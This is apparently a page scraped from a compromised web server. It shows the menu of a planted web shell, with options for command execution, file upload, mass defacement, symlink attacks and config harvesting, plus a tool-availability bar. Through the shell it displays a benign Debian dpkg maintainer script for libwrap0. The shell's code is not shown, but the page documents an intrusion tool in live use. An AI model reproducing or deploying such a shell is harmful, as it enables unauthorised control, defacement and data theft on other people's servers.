OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/../srv/../var/lib/cloud/../sudo/../dpkg/info/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh -e if [ "$1" = "purge" ] && \ [ "$(dpkg-query --show libwrap0 2> /dev/null | wc -l)" = 1 ]; then rm -f /etc/hosts.allow /etc/hosts.deny fi